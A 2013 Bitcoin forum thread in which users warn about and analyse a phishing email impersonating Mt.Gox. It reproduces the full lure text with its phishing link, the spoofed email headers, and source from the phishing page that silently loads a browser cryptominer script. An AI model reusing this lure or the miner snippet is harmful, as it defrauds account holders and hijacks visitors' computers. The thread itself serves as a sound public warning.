Bitcoin Forum
November 11, 2024, 07:07:52 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Mt Gox email spoof...don't fall for it  (Read 2523 times)
jork (OP)
Newbie
*
Offline Offline

Activity: 15
Merit: 0



View Profile
March 30, 2013, 06:31:41 PM
 #1

Just received a very well done spoof email asking me to "re-verify my account" at Mt Gox because I used a VPN to access it. Don't fall for it! It sends you to a non-mtgox IP address that is a very well done copy of the real one. To test it I entered bogus account info and would you believe it! I got confirmed! I'm sure they'll get access to some accounts with this...It looks very authentic.

Here's the text of the spoof...


From: "Mt.Gox"<info@mtgox.com>
Date: March 30, 2013, 1:39:08 PM EDT
Subject: [Mt.Gox] Account Verification.
Reply-To: <info@mtgox.com>

Dear User,

We stated when you registered an account with us that accessing your
account via the Tor network and/or public proxies can lead to a temporary
suspension of your account, and having to submit AML documents to us.

You are recieving this e-mail because we suspect you of accessing
your account via the Tor network and/or public proxies.

To prevent your account from being suspended you are now required to
verify your account you must do this from your home network, without the
use of the Tor network and/or public proxies.

Click here to begin the verification process.
http://188.190.99.224/user-panel/

Best regards,
Mt.Gox team
info@mtgox.com
jackjack
Legendary
*
Offline Offline

Activity: 1176
Merit: 1280


May Bitcoin be touched by his Noodly Appendage


View Profile
March 30, 2013, 06:37:41 PM
 #2

Down

Own address: 19QkqAza7BHFTuoz9N8UQkryP4E9jHo4N3 - Pywallet support: 1AQDfx22pKGgXnUZFL1e4UKos3QqvRzNh5 - Bitcointalk++ script support: 1Pxeccscj1ygseTdSV1qUqQCanp2B2NMM2
Pywallet: instructions. Encrypted wallet support, export/import keys/addresses, backup wallets, export/import CSV data from/into wallet, merge wallets, delete/import addresses and transactions, recover altcoins sent to bitcoin addresses, sign/verify messages and files with Bitcoin addresses, recover deleted wallets, etc.
spunit262
Newbie
*
Offline Offline

Activity: 18
Merit: 0


View Profile
March 30, 2013, 06:49:42 PM
 #3

Down
It's up for me, just have to click though my browsers big red phishing warning.
mufa23
Legendary
*
Offline Offline

Activity: 1022
Merit: 1001


I'd fight Gandhi.


View Profile
March 30, 2013, 06:59:40 PM
 #4

But you received the email from "info@mtgox.com"? It's that an actual MtGox email account?

Positive rep with: pekv2, AzN1337c0d3r, Vince Torres, underworld07, Chimsley, omegaaf, Bogart, Gleason, SuperTramp, John K. and guitarplinker
Tamerz
Full Member
***
Offline Offline

Activity: 148
Merit: 102


View Profile
March 30, 2013, 07:12:02 PM
 #5

I got the same email and just came on to post this. It is spoofed from info@mtgox.com but the verification link points to a fishing site instead of the real one.
jork (OP)
Newbie
*
Offline Offline

Activity: 15
Merit: 0



View Profile
March 30, 2013, 07:13:48 PM
 #6

It's very easy to spoof the "from:" address of an email.
nimda
Hero Member
*****
Offline Offline

Activity: 784
Merit: 1000


0xFB0D8D1534241423


View Profile
March 30, 2013, 07:45:25 PM
 #7

Can you post the full email headers?
GernMiester
Sr. Member
****
Offline Offline

Activity: 285
Merit: 250


View Profile
March 30, 2013, 08:08:51 PM
 #8

That old leaked list rearing its ugly head again..
Tamerz
Full Member
***
Offline Offline

Activity: 148
Merit: 102


View Profile
March 30, 2013, 08:17:52 PM
 #9

Can you post the full email headers?

Code:
x-store-info:8Rlnjmxvy6L6cXs23gz/9HW3P3dIQ3IM1LzSJUtLUc4yN+HKAcM7JKKiY+saelOcD955T9yOw8f7HRE94ouZY2wNCjK2IqFhg0CuxfbbOdhQ8+gRAm/8reg8Ou22/6FEiD1MkCrNqVI=
Authentication-Results: hotmail.com; spf=pass (sender IP is 166.78.69.32) smtp.mailfrom=bounce+5898d8.b740-xxxxxx=hotmail.com@mailgun.org; dkim=none header.d=mtgox.com; x-hmca=none
X-SID-PRA: info@mtgox.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: s1:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0yO1NDTD0w
X-Message-Info: NhFq/7gR1vT/eGKLQPiFtR0wfNb/evU7Xcr8z3t50NldkK0korF+jKKL4cOtdOfJpJF6PJdsXjrKwfTT8LV9NItesF5vDqHTwfhQBhEVTAVl9GF9GLk0EV8uQas/+U1RXTCw1q7DZXfavDeGljMIQA==
Received: from m69-32.mailgun.net ([166.78.69.32]) by BAY0-MC3-F6.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Sat, 30 Mar 2013 11:38:59 -0700
DKIM-Signature: a=rsa-sha256; v=1; c=relaxed/relaxed; d=mailgun.org; q=dns/txt; s=mg;
 t=1364668738; h=Reply-To: From: Subject: Date: Mime-Version:
 Content-Type: Content-Transfer-Encoding: Message-Id: Sender;
 bh=eXdry3sgeZK7PlNGlFsH8jy8vitEz8aUU9HbC+BV2nM=; b=UCNoQLw4ONdNRzbOuvhw1hTV/rljrQY/i7U7n0Le+KSWARAfo8HaNvHr9/toHbXBzQ22dB0d
 TGFrmFq2e+Lan6OQl7amSQkuGgp0dtH3I+Z8jB7hE72jSkcCCS3oYP29n5p1Nl9AvgpFfAGd
 mroLKD/HrXOT98DokezjcYC120M=
DomainKey-Signature: a=rsa-sha1; c=nofws; d=mailgun.org; s=mg; q=dns;
 h=Reply-To: From: Subject: Date: Mime-Version: Content-Type:
 Content-Transfer-Encoding: Message-Id: Sender;
 b=JCeyX/Fg/w7Tcq8M9+QRFVgqsvX2RmfU7zL6rafAkh2q0j/O45dwLgjVsl0BYwPH3sFbcz
 e13pZre4NMPAnui6UAFNWjfESeNx7wswDH8zPB6ULERva040d5c3rDuZhOiAUAtR/0DXHZmp
 0C4kLib/OkSc04z0hLKB/U6HyqlFw=
Received: by luna.mailgun.net with SMTP mgrt 8758583633337; Sat, 30 Mar 2013
 18:38:57 +0000
Received: from User (dab-crx1-h-1-8.dab.02.net [82.132.226.244]) by
 mxa.mailgun.org with ESMTP id 5157313b.557f300-in2; Sat, 30 Mar 2013
 18:38:51 -0000 (UTC)
Reply-To: <info@mtgox.com>
From: "Mt.Gox"<info@mtgox.com>
Subject: [Mt.Gox] Account Verification
Date: Sat, 30 Mar 2013 18:38:57 -0000
Mime-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-Mimeole: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20130330183851.27733.59484@fas12s.mailgun.org>
X-Mailgun-Sid: WyI0OTM0NSIsICJ0YW1lc21jdGlndWVAaG90bWFpbC5jb20iLCAiYjc0MCJd
Sender: info=mtgox.com@mailgun.org
Bcc:
Return-Path: bounce+5898d8.b740-xxxxx=hotmail.com@mailgun.org
X-OriginalArrivalTime: 30 Mar 2013 18:38:59.0828 (UTC) FILETIME=[D7FABB40:01CE2D75]
Meizirkki
Hero Member
*****
Offline Offline

Activity: 616
Merit: 500



View Profile
March 30, 2013, 08:24:12 PM
 #10

Let's piss off the attackers and everyone fill in random wrong info Cheesy
zvs
Legendary
*
Offline Offline

Activity: 1680
Merit: 1000


https://web.archive.org/web/*/nogleg.com


View Profile WWW
March 30, 2013, 08:41:50 PM
 #11

yeah, i filled it in

username: yomommashouse
password:  Shocked

i didnt check to see what javascript was on there, but mine is disabled
Lethn
Legendary
*
Offline Offline

Activity: 1540
Merit: 1000



View Profile WWW
March 30, 2013, 08:58:24 PM
 #12

It's good you're warning people but phew it amazes me the scams and such Bitcoin people are falling for these days lol >_> it should be common knowledge now that all these companies already have your details and can do whatever they need to do right from their own computers.
nimda
Hero Member
*****
Offline Offline

Activity: 784
Merit: 1000


0xFB0D8D1534241423


View Profile
March 30, 2013, 09:44:21 PM
 #13

Can you post the full email headers?

Code:
[Some headers]

Classic sender spoof. Nothing to worry about.
WiW
Sr. Member
****
Offline Offline

Activity: 277
Merit: 250


"The public is stupid, hence the public will pay"


View Profile
March 31, 2013, 01:15:21 PM
 #14

Quote
Reported Phishing Website Ahead!
Google Chrome has blocked access to 188.190.99.224. This website has been reported as a phishing website.
Phishing websites are designed to trick you into disclosing your login, password or other sensitive information by disguising themselves as other websites you may trust.

Besides, the fact that the address it's pointing you to is an IP address and not mtgox.com should set off your alarms before you even click it, if the email alone is not enough...
Amitabh S
Legendary
*
Offline Offline

Activity: 1001
Merit: 1005


View Profile
March 31, 2013, 05:11:44 PM
 #15

Whois:

IP    :   188.190.99.224        Neighborhood
Host    :   tradz.infium.net    Not OK
Country    :   Ukraine   

Location:

http://www.infosniper.net/index.php?ip_address=188.190.99.224&map_source=1&overview_map=1&lang=1&map_type=1&zoom_level=7

Coinsecure referral ID: https://coinsecure.in/signup/refamit (use this link to signup)
jp
Member
**
Offline Offline

Activity: 69
Merit: 10



View Profile WWW
March 31, 2013, 06:09:23 PM
 #16

So if you just visit the base of the site: 188.190.99.224 and click "view source", you find something interesting:

Code:
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
<script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner("derek.andersons@hotmail.com")</script>

Helping the world exit the traditional financial system.
jp
Member
**
Offline Offline

Activity: 69
Merit: 10



View Profile WWW
March 31, 2013, 06:10:18 PM
 #17

Notice derek.andersons@hotmail.com? No one could really be that dumb, could they?

Helping the world exit the traditional financial system.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!